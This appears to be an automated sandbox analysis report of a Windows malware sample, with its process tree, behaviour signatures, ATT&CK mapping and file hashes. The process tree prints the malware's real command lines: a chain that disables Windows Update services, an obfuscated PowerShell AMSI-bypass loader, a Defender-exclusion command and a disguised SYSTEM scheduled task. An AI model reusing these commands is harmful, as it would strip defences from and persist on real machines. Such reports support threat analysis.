Analysis

  • max time kernel
    48s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    05-05-2022 00:56

General

  • Target

    File.exe

  • Size

    4.0MB

  • MD5

    f74ccaec9935cca19122478058c39f79

  • SHA1

    5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527

  • SHA256

    8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a

  • SHA512

    2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 61 IoCs
  • Modifies registry key 1 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\File.exe
    "C:\Users\Admin\AppData\Local\Temp\File.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Users\Admin\AppData\Roaming\[New]344334.exe
      C:\Users\Admin\AppData\Roaming\[New]344334.exe
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4812
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2132
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1048
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4220
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          4⤵
            PID:4292
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            4⤵
              PID:540
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              4⤵
                PID:2192
              • C:\Windows\system32\sc.exe
                sc stop bits
                4⤵
                  PID:1060
                • C:\Windows\system32\sc.exe
                  sc stop dosvc
                  4⤵
                    PID:4260
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                    4⤵
                    • Modifies registry key
                    PID:5096
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                    4⤵
                    • Modifies registry key
                    PID:4448
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                    4⤵
                    • Modifies security service
                    • Modifies registry key
                    PID:4284
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                    4⤵
                    • Modifies registry key
                    PID:1360
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                    4⤵
                    • Modifies registry key
                    PID:2576
                  • C:\Windows\system32\takeown.exe
                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:760
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:2624
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:2112
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:2128
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:2356
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  3⤵
                  • Drops file in Windows directory
                  PID:4444
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:780
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
                    4⤵
                    • Creates scheduled task(s)
                    PID:1820
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
                  3⤵
                    PID:1884
                    • C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
                      C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
                      4⤵
                        PID:2176
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
                          5⤵
                            PID:4892
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
                              6⤵
                                PID:3832
                      • C:\Users\Admin\AppData\Roaming\ger.exe
                        C:\Users\Admin\AppData\Roaming\ger.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:460
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4852
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:rGLtOhFiCmid{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IwlXkGEmwqZBmS,[Parameter(Position=1)][Type]$ghxqtBRSGB)$HYTXuBcoLdx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$HYTXuBcoLdx.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$IwlXkGEmwqZBmS).SetImplementationFlags('Runtime,Managed');$HYTXuBcoLdx.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ghxqtBRSGB,$IwlXkGEmwqZBmS).SetImplementationFlags('Runtime,Managed');Write-Output $HYTXuBcoLdx.CreateType();}$keeKgdZqwcuQu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$lmBRnGZddYhsRU=$keeKgdZqwcuQu.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hNATbfoaebXSkoaAPIh=rGLtOhFiCmid @([String])([IntPtr]);$kXcPDjeZCvAGqHbJmWRqdf=rGLtOhFiCmid 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kFDUHJKPfVu=$keeKgdZqwcuQu.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$sorrBYAHgsjTLX=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$kFDUHJKPfVu,[Object]('Load'+'LibraryA')));$XgDywUZjNrbTqCukt=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$kFDUHJKPfVu,[Object]('Vir'+'tual'+'Pro'+'tect')));$BTwuEjv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sorrBYAHgsjTLX,$hNATbfoaebXSkoaAPIh).Invoke('a'+'m'+'si.dll');$VLgICEuFpaNOwkUMk=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$BTwuEjv,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VHdOFdKCSa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XgDywUZjNrbTqCukt,$kXcPDjeZCvAGqHbJmWRqdf).Invoke($VLgICEuFpaNOwkUMk,[uint32]8,4,[ref]$VHdOFdKCSa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$VLgICEuFpaNOwkUMk,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XgDywUZjNrbTqCukt,$kXcPDjeZCvAGqHbJmWRqdf).Invoke($VLgICEuFpaNOwkUMk,[uint32]8,0x20,[ref]$VHdOFdKCSa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
                      1⤵
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2872
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lidnqEOIVwEG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vNUMrRLSZXBjgG,[Parameter(Position=1)][Type]$AnHDgJfxAO)$WgstumZpaFr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$WgstumZpaFr.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$vNUMrRLSZXBjgG).SetImplementationFlags('Runtime,Managed');$WgstumZpaFr.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$AnHDgJfxAO,$vNUMrRLSZXBjgG).SetImplementationFlags('Runtime,Managed');Write-Output $WgstumZpaFr.CreateType();}$hBQlRohaBMdUo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$rMJmrNKHNnAqkY=$hBQlRohaBMdUo.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XhsktYzjyMofJVtXwqs=lidnqEOIVwEG @([String])([IntPtr]);$DquWmwJESRZiqJSKfIKhvr=lidnqEOIVwEG 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pUouaoPSBEI=$hBQlRohaBMdUo.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$xrMJDGyXylXHva=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$pUouaoPSBEI,[Object]('Load'+'LibraryA')));$DboijGHkrpDUyNTWk=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$pUouaoPSBEI,[Object]('Vir'+'tual'+'Pro'+'tect')));$QWDsDYe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xrMJDGyXylXHva,$XhsktYzjyMofJVtXwqs).Invoke('a'+'m'+'si.dll');$POdrWVseLQWFgGpcg=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$QWDsDYe,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WedNKnyFXl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DboijGHkrpDUyNTWk,$DquWmwJESRZiqJSKfIKhvr).Invoke($POdrWVseLQWFgGpcg,[uint32]8,4,[ref]$WedNKnyFXl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$POdrWVseLQWFgGpcg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DboijGHkrpDUyNTWk,$DquWmwJESRZiqJSKfIKhvr).Invoke($POdrWVseLQWFgGpcg,[uint32]8,0x20,[ref]$WedNKnyFXl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
                      1⤵
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2452
                    • C:\Windows\System32\dllhost.exe
                      C:\Windows\System32\dllhost.exe /Processid:{364bf40b-3cad-4ad6-9fa8-d40b12851d88}
                      1⤵
                        PID:2228
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -pss -s 456 -p 3308 -ip 3308
                        1⤵
                          PID:2576
                        • C:\Windows\system32\WerFault.exe
                          C:\Windows\system32\WerFault.exe -pss -s 448 -p 1484 -ip 1484
                          1⤵
                            PID:1772
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 3308 -s 936
                            1⤵
                            • Program crash
                            PID:5112
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 1484 -s 352
                            1⤵
                            • Program crash
                            PID:3968
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 1484 -s 352
                            1⤵
                            • Program crash
                            PID:400
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 3308 -s 936
                            1⤵
                            • Program crash
                            PID:5072

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Execution
    • Scheduled Task, T1053: 1
  • Persistence
    • Modify Existing Service, T1031: 2
    • Scheduled Task, T1053: 1
  • Privilege Escalation
    • Scheduled Task, T1053: 1
  • Defense Evasion
    • Modify Registry, T1112: 2
    • Impair Defenses, T1562: 1
    • File Permissions Modification, T1222: 1
  • Discovery
    • Query Registry, T1012: 1
    • System Information Discovery, T1082: 2
  • Impact
    • Service Stop, T1489: 1

Downloads

                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER91FA.tmp.csv
                            Filesize

                            40KB

                            MD5

                            6b07ee972ebdc98c44d3e1965f2ffa49

                            SHA1

                            ebc1669edb2f015baba53179d99b6da55c888687

                            SHA256

                            f84037ed8001e4385fb6a32b66adf234aed219854ac2c972ed43b59b5f62d9a1

                            SHA512

                            4292cdd27d35afc6ea813873e3f0ad71d2cc381532a74587e0eed6d1cd04346f388f5995820c242ebd39e873efa703309076f170bdaa2c10af2df10c608d1f18

                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER91FB.tmp.csv
                            Filesize

                            40KB

                            MD5

                            46a269e2d5c8e6503cedfb77eab4cab4

                            SHA1

                            b4ba2f49448f2c23afcbc188f416493e8044f1d2

                            SHA256

                            6f06baa44e15ff010913cd332ee1600a283ae22634c07ca8dba5c64106354f55

                            SHA512

                            c2f6ff7b43e86859dcf2d12c138607b9a72cd215e5892ccf4626c72be941e839b00a75fa86991cad6fd1fbb4a284c993ee28342799e7bc2bf384b8d587c5fe82

                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C1.tmp.txt
                            Filesize

                            13KB

                            MD5

                            a33618cc76d6bd89f8fa377c1b98d483

                            SHA1

                            47a330f34d40bdb6a7e397406e7918bf12be0b74

                            SHA256

                            1375a574b2e13115eb9d5d3f325861100cc6022e2ad193a73d7e09ff3cd371f3

                            SHA512

                            a68bd2d37de5db575c5120612cce2ff03f805b45ba54683500f45199a2fc4702875657646136ac356b14c28e617672c952db5cbbdea26c63f417fa20a729eaa9

                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C2.tmp.txt
                            Filesize

                            13KB

                            MD5

                            49a8f78539b17863bc6e78e5364e4dac

                            SHA1

                            37d18edfa90d09491017dc7fbeeaed47949ad52f

                            SHA256

                            8dc7641b53903d5b00d43ca7239393483fb7bbef3ae7df8a40aeee98f036fa46

                            SHA512

                            5d8511772e19bba7f34421693311f20871de285273f3e15f525f8482cfe2850c24323bf17ad9bfedbdfa59273a44540280ab753b79ea11b1014989668eeb9fe3

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                            Filesize

                            2KB

                            MD5

                            440cb38dbee06645cc8b74d51f6e5f71

                            SHA1

                            d7e61da91dc4502e9ae83281b88c1e48584edb7c

                            SHA256

                            8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

                            SHA512

                            3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            944B

                            MD5

                            3e4d57d0f5914187ae1b311f72341c51

                            SHA1

                            4d0db398175c6d2d35774404afb8fd98071d010e

                            SHA256

                            07fbda60444acc176e8890e957c88bc21ee4abd34603a487745fcaea142bd369

                            SHA512

                            e618e578f4c1887d52feb022520ab1a4c6f3f200aeb3d3cc721ba151624fd7a60a1185a61620b629569bbcde64cf27958331baf8efd29d691dfad3a215edf1db

                          • C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
                            Filesize

                            254.9MB

                            MD5

                            6893fc513fff739b36b4521285f9b800

                            SHA1

                            c7a632a7b30c7839904249d87a380d8aef44d3c0

                            SHA256

                            edbeedeec9ecb8c19b6ddd93b47968b6b2c3c6ff2a92166bf75f63a3a2749e3f

                            SHA512

                            b50acc1408a3bae46a6258447874cd1f6049923dd58311a4fed5e2038027a64fd0076078d2358c48bded153c56d7fa24fcead281d7ea6e61af1346b143413b39

                          • C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
                            Filesize

                            254.3MB

                            MD5

                            2e8a33ed06e1271a98bdd321faf83d15

                            SHA1

                            9228fee5a8fc578720727be08783333eb4442bd3

                            SHA256

                            15633232144436a7b73bc2ccb8de6e35af9e6c937eca8d8f8784dd5a5aaeeb20

                            SHA512

                            28bc04e616757e91ec2e710bd674bc06aaf1a067e4197f2ffbbf1d687fbed94e05cc61258f490b123fdb529cf37f8c91f3d8bd2f285e0debee7bb3e1c09bd3a8

                          • C:\Users\Admin\AppData\Roaming\[New]344334.exe
                            Filesize

                            487.2MB

                            MD5

                            e0384f56863ff9dade991a2585a6c743

                            SHA1

                            1e224626dabb3543da8b9d23cb390d9a3ad2341b

                            SHA256

                            af6cbf4108c25de39653bb2f7e0702cb3a9f720c3bdc074ceb784dde204c4009

                            SHA512

                            ce9bb394e76cd0c543034c821a41c7922917cb12701256a5e4f0b53bbe6814fd1f773f7469ab97090bc44058f88f11bf58358e502bbb2af9790577d605b81edd

                          • C:\Users\Admin\AppData\Roaming\[New]344334.exe
                            Filesize

                            488.9MB

                            MD5

                            6adb34f3dd9e21a3fa7e8c7ae01d51d4

                            SHA1

                            49d384bc9f55f41a04e709e853de796349d9a1cd

                            SHA256

                            92769fed01e96f67b08224816f8181cfef7c04852b7cee6d7f1bc837763bec9d

                            SHA512

                            20d1e32c98a01dae8652362c0b1737f05fb92d0109a037069e8d5c27d091b62f175082bad51f82685f8ad48277d0b5959f14d41b74bab5ad9d5401a9afe5ec7b

                          • C:\Users\Admin\AppData\Roaming\ger.exe
                            Filesize

                            1.9MB

                            MD5

                            ebc48d85bce66e7534e695c2eb990fc7

                            SHA1

                            de42ec460cbcee1d8d1629d41d0764eb16799361

                            SHA256

                            32fb10396b6c9644eff88481e1ee9cd59c16d4d19848b8d16f22fd4978d3817c

                            SHA512

                            da1f92f12c4dbeafe088308fe03b6876fe20c9fbe7b1bc0303a6be727829f476a854df7c817832dcea0fea46d1bdfb3b4da5c9168a7032320dbf937fad93ddd8


                          • memory/1244-204-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1308-320-0x00000205F8BC0000-0x00000205F8BEA000-memory.dmp
                            Filesize

                            168KB

                          • memory/1308-203-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1360-175-0x0000000000000000-mapping.dmp
                          • memory/1364-224-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1388-319-0x000001B4A9330000-0x000001B4A935A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1388-202-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1396-208-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1492-206-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1552-207-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1576-212-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1608-312-0x0000022CC2B70000-0x0000022CC2B9A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1608-261-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1628-211-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1652-209-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1696-210-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1764-219-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1772-289-0x000002207DD40000-0x000002207DD6A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1772-286-0x0000000000000000-mapping.dmp
                          • memory/1772-291-0x000002207E150000-0x000002207E17A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1820-166-0x0000000000000000-mapping.dmp
                          • memory/1824-214-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1828-223-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1860-218-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1868-217-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1884-195-0x0000000000000000-mapping.dmp
                          • memory/1900-216-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1964-215-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2036-213-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2044-281-0x000001F891A00000-0x000001F891A2A000-memory.dmp
                            Filesize

                            168KB

                          • memory/2112-318-0x0000000000000000-mapping.dmp
                          • memory/2128-349-0x0000000000000000-mapping.dmp
                          • memory/2132-148-0x0000000000000000-mapping.dmp
                          • memory/2176-196-0x0000000000000000-mapping.dmp
                          • memory/2176-199-0x00007FFCB62C0000-0x00007FFCB6D81000-memory.dmp
                            Filesize

                            10.8MB

                          • memory/2192-163-0x0000000000000000-mapping.dmp
                          • memory/2200-222-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2228-187-0x0000000140000000-0x0000000140040000-memory.dmp
                            Filesize

                            256KB

                          • memory/2228-188-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmp
                            Filesize

                            2.0MB

                          • memory/2228-184-0x0000000140000000-0x0000000140040000-memory.dmp
                            Filesize

                            256KB

                          • memory/2228-185-0x00000001400024C8-mapping.dmp
                          • memory/2228-191-0x00007FFCD4220000-0x00007FFCD42DE000-memory.dmp
                            Filesize

                            760KB

                          • memory/2228-194-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmp
                            Filesize

                            2.0MB

